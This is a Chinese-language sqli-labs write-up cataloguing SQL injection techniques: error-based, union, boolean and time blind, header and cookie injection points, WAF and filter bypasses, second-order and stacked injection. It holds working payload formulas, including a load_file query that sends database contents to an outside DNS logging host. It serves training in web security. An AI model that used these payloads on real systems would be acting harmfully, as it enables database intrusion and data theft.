sql-lab

1. 加单引号报错得到报错信息

2. 根据报错信息判断闭合条件

3. order by找字段数

4. union select找回显位置

5. 找到回显位置正常爆数据

6. 相同类型其他关卡

后端代码分析

GET方式获取id，单引号闭合，将查询到的数据输出到页面上

1. 加单引号得到报错信息

2. 根据报错信息判断闭合条件

3. order by找字段数

4. union select没有回显位置

盲注

1. 基于floor报错的盲注

   原理是利用group by 处理rand 函数进行处理时，会多次对同一列进行查询，返回duplicate key 错误

利用公式

union Select 1,count(*),concat(你希望的查询语句,floor(rand(0)*2))a from information_schema.columns group by a--+ 

1. updatexml报错注入

利用公式

and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)--+ 

1. extractvalue报错注入

利用公式

and extractvalue(1, concat(0x7e, (select @@version),0x7e))--+ 

updatexml和extractvalue 在MySQL 5.1.5版本及以后版本中用于对XML文件进行处理，当Xpath 路径出错时会报错。

3. 基于bool判断的盲注

利用公式

' or Length(database()) = 8--+ 

根据页面是否返回正常判断bool判断是否正确。

4. 基于时间的盲注

利用公式

'  and if((select length(database())>7)>0,sleep(5),null) --+ 

sleep()和benchmark()可以用于延时注入，根据页面响应时间判断是否正确。

5. DNSlog平台盲注

DNSlog注入原理通过子查询，将内容拼接到域名内，让load_file()去访问共享文件，访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件，通过拼接出函数做查询,拼接到域名中，访问时将访问服务器，记录后查看日志。可用于SQL注入中的盲注，XSS盲打，无回显的命令执行，无回显的SSRF，无回显的XXE（Blind XXE）。用于SQL盲注时需要满足secure_file_priv 为空。

利用公式

' and load_file(concat('\\\\',(select database()),'.**.ceye.io\\sql'))--+ 

sql-lab利用DNSlog平台注入

后端代码分析

GET方式获取id，单引号闭合，如果在数据库中查询到相关信息，返回特定信息作为flag，否则返回数据库错误信息。

post 类型联合查询注入

1.判断

2.爆数据

3.后端代码分析

POST方式获取用户名和密码，单引号闭合，并将查询的数据显示在页面上。

post 类型盲注

1.判断

2.爆数据

3.后端代码分析

POST方式获取用户名和密码，单引号闭合，查询的数据不显示在页面上，只显示一个登陆成功的图片。

没有错误回显时，可以借助or 1=1或者and 1=1以及order by判断闭合方式，有查询内容回显时也可以借助union select共同判断。

没有错误回显也没有内容回显，不能使用报错注入，只能使用布尔和时间盲注。

1. 判断闭合

2.爆数据

3.后端代码分析

POST方式获取用户名和密码，单引号闭合，查询的数据不显示在页面上，只显示一个登陆成功的图片，不显示报错信息。

不同注入点的注入类型

注入点在password 处

常见重置密码等数据库更新数据库的情况下

1.判断

2.爆数据

3.后端代码分析

POST方式获取用户名，然后再在更新密码处拼合，所以注入点在password。

注入点在usagent 处

1.注入单引号闭合，不能使用连接符+连接语句，不能使用注释符闭合。

2.后端代码分析

先获取用户名，在将ip信息和usagent信息插入数据库，原查询语句有过滤，所以没有漏洞。

注入点在referer 处

1.注入单引号闭合，不能使用连接符+连接语句，不能使用注释符闭合。

2.后端代码分析

先获取用户名，在将referer信息和usagent信息插入数据库，原查询语句有过滤，所以没有漏洞。

注入点在cookie 处

1.注入单引号闭合，不能使用连接符+连接语句，不能使用注释符闭合。

2.后端代码分析

前面查询用户的数据处做了过滤，后面又通过cookie 查询数据，存在注入。

cookie 注入base64编码

1.注入单引号闭合，不能使用连接符+连接语句，不能使用注释符闭合，对注入语句进行base64编码。

2.后端代码分析

主要对cookie 进行了base64编码

过滤绕过

过滤注释符

1.注入单引号闭合，不能使用注释符，使用and 和or 闭合语句。

2.后端代码分析

过滤了注释符

二次注入绕过过滤

1.注册一个新账号admin'#

2.修改新注册账号admin'# 的密码

3.实际上修改了admin 的密码

4.后端代码分析

通过注释符更新其他用户密码

过滤and和or

1.双写绕过

2.后端代码分析

匹配一次并替换成空格

过滤一大堆

1.and和or双写绕过，单引号闭合代替注释，括号代替空格，盲注

2.后端代码分析

过滤了一大堆

两层服务架构，参数污染绕WAF

https://blog.csdn.net/m0_54899775/article/details/122156208

宽字节注入

1.通过%bf或者其他ascii码大于128的字符进行绕过

2.后端代码分析

addslashes函数转换' 为'

post 类型宽字节注入

1.将 utf-8 转换为 utf-16 或 utf-32，例如将 '转为 utf-16 为 � ' ，进行注入

https://www.cnblogs.com/bmjoker/p/9134830.html

堆叠注入

用户采用PDO编程（ POD（PHP Data Object））且没有对参数进行过滤

mysqli_multi_query()函数也可以造成堆叠注入

https://blog.csdn.net/weixin_42530572/article/details/106439380

1.堆叠插入一条数据。

2.后端代码分析

使用函数mysqli_multi_query()，可同时执行多条sql语句

post类型堆叠注入

1.堆叠插入一条数据

http://bc.twsec.com.cn/sqli1/Less-42/login.php

order by语句与limit语句的注入

order by 注入

1.报错注入

2.后端代码分析

order by 后面是注入点，不能使用union select 注入，使用报错注入或盲注

https://blog.csdn.net/m0_54899775/article/details/122202855

前面的内容，练习巩固。